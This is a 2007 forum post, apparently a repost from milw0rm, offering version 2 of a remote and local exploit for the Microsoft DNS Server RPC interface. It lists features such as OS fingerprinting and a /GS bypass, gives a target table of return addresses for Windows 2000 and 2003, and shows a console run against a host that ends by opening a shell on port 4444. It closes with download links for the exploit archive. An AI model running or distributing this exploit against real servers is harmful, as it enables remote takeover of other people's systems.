buRn Posted April 18, 2007 Report Posted April 18, 2007 Exploit v2 features: - Target Remote port 445 (by default but requires auth) - Manual target for dynamic tcp port (without auth) - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting (auto target) - Windows 2000 server and Windows 2003 server (Spanish) supported by default - Fixed bug with Windows 2003 Shellcode - Universal local exploit for Win2k (automatic search for opcodes) - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled) - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns) - Microsoft RPC api used ( who cares? )D:\Programación\DNSTEST>dnstest -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- Usage: dnstest -h 127.0.0.1 (Universal local exploit) dnstest -h host [-t id] [-p port] Targets: 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3) 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k ) 2 (0x7c4fedbb) - Win2k server SP4 English 3 (0x7963edbb) - Win2k server SP4 Italian 4 (0x41414141) - Windows all Denial of ServiceD:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2 -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 --------------------------------------------------------------[+] Trying to fingerprint target.. (05.02)[+] Remote Host identified as Windows 2003[-] No port selected. Trying Ninja sk1llz[+] Binding to ncacn_ip_tcp: 192.168.1.2[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105][+] Dynamic DNS rpc port found (1105)[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105][+] RpcBindingFromStringBinding success[+] Sending Exploit code to DnssrvOperation()[+] Now try to connect to port 4444also available athttp://514.es/Microsoft_Dns_Server_Exploit_v2.1.ziphttp://www.48bits.com/exploits/dnsxpl.v2.1.zip http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip# milw0rm.com [2007-04-18] Quote
